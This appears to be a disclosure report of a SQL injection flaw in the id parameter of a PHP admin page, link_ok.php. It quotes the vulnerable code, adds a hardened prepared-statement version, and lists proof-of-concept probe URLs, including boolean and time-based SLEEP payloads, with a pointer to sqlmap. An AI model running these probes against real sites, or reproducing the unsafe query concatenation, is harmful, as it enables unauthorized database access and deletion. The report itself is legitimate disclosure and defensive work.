bug_l
Build environment: PHP5.
--------------------------------
affected source code file: /admin/link/link_ok.php
--------------------------------
affected source code:
<?php
require_once '../../inc/const.php';
$act = $_GET['act'];
$id = getvar('id');          // taken straight from the request, never validated
$name = getvar('name');
$url = getvar('url');
$content = getvar('content');
$state = getvar('state');
if ($act == 'add') {
    $record = array(
        'name'    => $name,
        'url'     => $url,
        'content' => $content,
        'addtime' => date("y-m-d H-i-s"),
        'state'   => $state
    );
    $id = $db->insert($GLOBALS[databasePrefix].'link', $record);
    echo "<script>alert('添加成功!');window.location='link_manage.php';</script>";
}
if ($act == 'mod') {
    $record = array(
        'name'    => $name,
        'url'     => $url,
        'content' => $content,
        'state'   => $state
    );
    // $id is concatenated directly into the WHERE clause
    $db->update($GLOBALS[databasePrefix].'link', $record, 'id='.$id);
    echo "<script>alert('修改成功!');window.location='link_manage.php';</script>";
}
if ($act == 'del') {
    //del_file($id);
    // same unescaped concatenation of $id into the WHERE clause
    $db->delete($GLOBALS[databasePrefix].'link', "id=".$id);
    echo "<script>alert('删除成功!');window.location='link_manage.php';</script>";
}
?>
--------------------------------
affected reason:
We can see that the $id parameter is neither validated nor escaped before it is concatenated into the WHERE clause of the update and delete queries. SQL injection is therefore possible through the id parameter of /admin/link/link_ok.php (an authenticated admin session is required to reach this file).
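A hardened version of the mod and del branches, added here as an example and not the project's own code: $id must be a plain positive integer before it reaches any query, and the query itself is issued through a PDO prepared statement instead of string concatenation. The PDO handle $pdo and the prefix $prefix (standing in for the project's databasePrefix) are assumptions; the project's $db wrapper is not used because its API is not shown on the page.

```php
<?php
// Added example, not the project's code. Assumes a PDO handle $pdo and the
// table prefix in $prefix (the project's databasePrefix); both are placeholders.

// Accept only a plain positive integer id. ctype_digit() rejects quotes,
// spaces and keywords, so an id like "1 and 1=1" never reaches the query.
function requireIntId($raw) {
    if (!is_string($raw) || $raw === '' || !ctype_digit($raw)) {
        http_response_code(400);
        exit('invalid id');
    }
    return (int) $raw;
}

// A table prefix cannot be bound as a parameter, so it must be a trusted
// configuration constant; this guard makes that assumption explicit.
function requireSafePrefix($prefix) {
    if (!preg_match('/^[A-Za-z0-9_]*$/', $prefix)) {
        throw new RuntimeException('unsafe table prefix');
    }
    return $prefix;
}

function deleteLink(PDO $pdo, $prefix, $rawId) {
    $id = requireIntId($rawId);
    $table = requireSafePrefix($prefix) . 'link';
    // The id is bound as an integer parameter, never concatenated.
    $stmt = $pdo->prepare("DELETE FROM {$table} WHERE id = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

function updateLink(PDO $pdo, $prefix, $rawId, array $record) {
    $id = requireIntId($rawId);
    $table = requireSafePrefix($prefix) . 'link';
    // The column list is fixed and every value is bound, so neither the
    // column names nor the values can alter the statement.
    $stmt = $pdo->prepare(
        "UPDATE {$table} SET name = :name, url = :url, content = :content, state = :state WHERE id = :id"
    );
    foreach (array('name', 'url', 'content', 'state') as $col) {
        $stmt->bindValue(':' . $col, isset($record[$col]) ? $record[$col] : '');
    }
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}
```

In link_ok.php the del branch would then call deleteLink($pdo, $prefix, $_GET['id']) and the mod branch updateLink($pdo, $prefix, $_GET['id'], $record); the original getvar() helper is not used here because its behaviour is not shown on the page.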
--------------------------------
affected executable:
After signing in to the admin back end, we can use Burp Suite to capture requests to the following URLs:
Like this:
http://xx.xx.com/admin/link/link_ok.php?act=del&id=1'
http://xx.xx.com/admin/link/link_ok.php?act=del&id=1 and 1=1
http://xx.xx.com/admin/link/link_ok.php?act=del&id=1 and 1=2
http://xx.xx.com/admin/link/link_ok.php?act=del&id=1 RLIKE SLEEP(2)
The differing responses to these requests show the SQL injection problem.
Then, we can use tools like sqlmap for more information.